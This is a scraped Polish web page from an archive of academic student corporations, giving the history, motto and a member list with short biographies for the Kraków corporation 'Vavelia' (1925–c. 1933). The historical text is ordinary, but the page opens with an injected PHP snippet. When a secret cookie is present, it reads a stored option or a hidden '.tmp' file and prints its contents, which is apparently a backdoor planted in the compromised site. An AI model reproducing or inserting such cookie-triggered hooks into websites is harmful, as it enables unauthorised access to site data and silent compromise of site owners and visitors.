if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Vavelia

Dekiel Vavelii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka „Vavelia”
Siedziba:
Kraków
Data powstania:
1925 r.
Barwy:
stalowa – srebrna – fioletowa
Dewiza:
„Veritate ac labore” („Prawdą i pracą”)

Rys historyczny

Listownik Vavelii, 1931 r.

Vavelia została założona przez grupę studentów z Kielc w 1925 r. Pierwotnie nosiła nazwę “Euphoria”, którą zmieniono w 1926 r. na “Vavelia”. Prawdopodobnie organizacja ta nie była tożsama z powstałą wcześniej w 1923 r. w Krakowie K! Vavelia.

Od 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 31 I 1927 r.). Prawa członka rzeczywistego Związku uzyskała w listopadzie 1928 r. Działała prawdopodobnie do ok. 1933 r.

W 1930 r. kuratorem Vavelii z ramienia uniwersyteckiego Senatu był doc. Eugenjusz Artwiński, a siedziba Korporacji mieściła się przy ul. Zyblikiewicza 18.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 60 nazwisk, w tym dwóch członków honorowych.

Brak wiadomości o powojennej działalności Vavelii i spotkaniach jej członków.

Pieczęć Vavelii, 1931 r.

Lista członków

Poniższa, niekompletna lista członków Vavelii obejmuje ponad 60 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Eugeniusz Artwiński, (1 marca 1892 w Warszawie - 10 września 1944) s. Stefana, absolwent medycyny UJ, doktor, psychiatra, po ukończeniu doktoratu asystent w klinice Jana Piltza, od 1922 prymariusz oddziału neurologiczno-psychiatrycznego Szpitala św. Łazarza w Krakowie, docent UJ 1924, prof. tytularny 1935, kurator i Filister honorowy Vavelii, od zimy 1941 kierownik Kliniki Neurologicznej w Lwowskim Instytucie Państwowym, zmarł z powodu przewlekłej choroby serca
 2. Józef Ołpiński, (9 sierpania 1892 w Rzeszowie - 1 sierpnia 1988 w Kapsztadzie) s. Jana i Marii z Zajączkowskich, absolwent Gimnazjum w Brzeżanach i prawa UJ, żołnierz Legionów, urzędnik państwowy i działacz polityczny, m.in. starosta sochaczewski i będziński, wiceprezydent m. st. Warszawy, w 1939 dyrektor Biura Prezydialnego Prezesa Rady Ministrów, Filister honorowy Vavelii, od 1947 na emigracji w Związku i Republice Południowej Afryki

Członkowie rzeczywiści

 1. Tadeusz Bieżanowski (Bierzanowski), student praw UJ, akt. 1929-31, gospodarz sem. let. 1930/31
 2. Edward Buffi, założyciel Vavelii
 3. Józef Buffi, założyciel Vavelii
 4. Stanisław Drobiński, akt. 1929-31, prezes sem. zim. 1930/31
 5. Jan Dzikowski, założyciel Vavelii
 6. Kazimierz Farbowski, student i absolwent (mgr filozofii) Wydziału Filozoficznego UJ, akt. 1926-31, sekretarz sem. let. 1926/27, prezes 1927, olderman sem. zim. 1928/29, olderman sem. let. 1930/31
 7. Zygmunt Garlicki, założyciel Vavelii
 8. Antoni Gazeł, mgr
 9. Mirosław (Wiktor Mirosław) Głowacki, (29 lipca 1905 w Sklae - 20 października 1958 w Krakowie) s. Stanisława, absolwent Gimnazjum w Olkuszu, student Wydziału Filozoficznego UJ, student i absolwent Wydziału Górniczego AG 1925-37, prezes sem. zim. i sem. let. 1928/29, akt. 1927-31, po studiach w kopalniach soli Wieliczka i Bochnia 1937-39, “Piast” w Lędzinach 1939, kierownik ruchu w Fabryce Ołówków “Hardtmuth-Lechistan” w Krakowie 1941-44, dyrektor w Państwowej Szkole Górniczej w Krakowie 1945-58, asystent w Katedrze Górnictwa i Przeróbki Mechanicznej 1946-51, adiunkt w Katedrze Maszyn Górniczych 1957-58
 10. Dominik Gnoiński, założyciel Vavelii, akt. 1926-29, przewodniczący sądu honorowego sem. let. 1926/27, dr med., w 1939 w Grybowie
 11. Henryk Grudziński, (1902-1959) założyciel Vavelii, skarbnik 1927
 12. Zdzisław Karp (Korp), student WSH, akt. 1929-31, wiceprezes sem. let. 1930/31
 13. Tadeusz Karwański, student praw UJ, akt. 1929-31
 14. Kazimierz Kibler, akt. 1927-29, wiceprezes 1927, sekretarz sem. zim. 1928/29, olderman sem. let. 1928/29
 15. Jan Kolanowski, założyciel Vavelii
 16. Józef Kotuła, student prawa UJ, c. 1930, akt. 1930-31
 17. Marian Krężel, student prawa UJ, c. 1930, akt. 1930-31
 18. Stanisław Lachman, założyciel Vavelii
 19. Stanisław Litwin, student praw UJ, akt. 1929-31
 20. MIeczysław Łebkowski, założyciel Vavelii, prezes sem. let. 1926/27, dr
 21. Czesław Matynia, student w Krakowie, później UW Warszawa, akt. 1926-31, wiceprezes sem. let. 1926/27,
 22. Stanisław Mianowski, prezes sem. zim. 1929/30
 23. Zdzisław Monikowski, student AG, akt. 1929-31, sekretarz sem. let. 1930/31
 24. Andzej Morawski, student ASP, akt. 1928-31, sekretarz sem. let. 1928/29
 25. Feliks Mostek, założyciel Vavelii
 26. Tadeusz Motłoch, student Wydziału Filozoficznego UJ, c. 1930, akt. 1930-31
 27. Franciszek Mowel (Mowal), założyciel Vavelii
 28. Edward Nowaczek, student Wydziału Filozoficznego UJ, c. 1930, akt. 1930-31
 29. Władysław Nowicki, student filozofii UJ, akt. 1929-31
 30. Edward Okrasko, student WSH, akt. 1929-31
 31. Jerzy Ołpiński, student w Krakowie, później UW Warszawa, akt. 1926-31, skarbnik sem. let. 1926/27, sekretarz 1927
 32. Wł. Pasternak, założyciel Vavelii
 33. Wacław Pietrzykowski, student w Krakowie, później UP Poznań, akt. 1926-31
 34. Ignacy Prokop, założyciel Vavelii
 35. Tadeusz Przybylski, założyciel Vavelii
 36. Jerzy Rabstein, akt. 1929-31, sekretarz sem. zim. 1930/31
 37. Jerzy Rajchman, student med. UJ, akt. 1929-31
 38. Stanisław Sankowski, student Wydziału Filozoficznego UJ, akt. 1929-31
 39. Franciszek Siwiec, założyciel Vavelii, przewodniczący komisji rewizyjnej sem. let. 1926/27
 40. Zygmunt Sladkowski, akt. 1926-27
 41. Franciszek Stalmach, założyciel Vavelii
 42. Tadeusz Stanczykiewicz, założyciel Vavelii
 43. Wacław Szarbiński, akt. 1929, mgr
 44. Marian Szydłowski, student AG, akt. 1929-31, gospodarz sem. zim. 1930/31
 45. Stanisław Szymański, student Wydziału Filozoficznego UJ, c. 1930, akt. 1930-31
 46. Juljan Świder, założyciel Vavelii
 47. Stanisław Świecki, (2 kwietnia 1910 w miejsc. Klimkiewiczów - 3 września 1939 pod Janowem) s. Stanisława, absolwent Gimnazjum Humanistycznego w Końskich, student i absolwent Wydziału Górniczego 1929-37, akt. 1930-31, skarbnik sem. let. 1930/31, inż. w kopalni “Dębieńsko” i “Siemianowicach” w Siemianowicach, uczestnik wojny obronnej 1939, poległ w bitwie pod Janowem
 48. Herbert Thomalla, skarbnik sem. zim. 1930/31
 49. Kazimierz Tyliński, student prawa UJ, akt. 1929-31
 50. Antoni Weidel, student prawa UJ, akt. 1929-31
 51. Eugeniusz Weiss, student filozofii, akt. 1928-31, sekretarz, wiceprezes sem. zim. 1930/31, prezes sem. let. 1930/31
 52. Marcin Wieczorek, student UJ, c. 1930, akt. 1930-31
 53. Reinhold Witczak, student prawa UJ, akt. 1929-31
 54. Mieczysław Wojtaszewski, akt. 1928-29, prezes sem. zim. i sem. let. 1928/29
 55. Wojciech Wójcick, student Wydziału Filozoficznego UJ, c. 1930, akt. 1930-31
 56. Marian Zamełło, (29 listopada 1908 w Lubczy - ) student med. UJ, akt. 1929-31, olderman sem. zim. 1930/31, student i absolwent 1936 med. UW, dr med. UJ 1948, ginekolog i położnik, w 1956 adiunkt w Kinice Ginekologiczno-Położniczej AM w Krakowie
 57. Zygmunt Żarecki, student prawa UJ, c. 1930, akt. 1930-31

Listę członków opracowano na podstawie:

1) „Vavelia” Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, 32 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Vavelia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VIII 2010 r.
Ostatnia zmiana: 27 XI 2011 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka „Vavelia” (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 27 XI 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }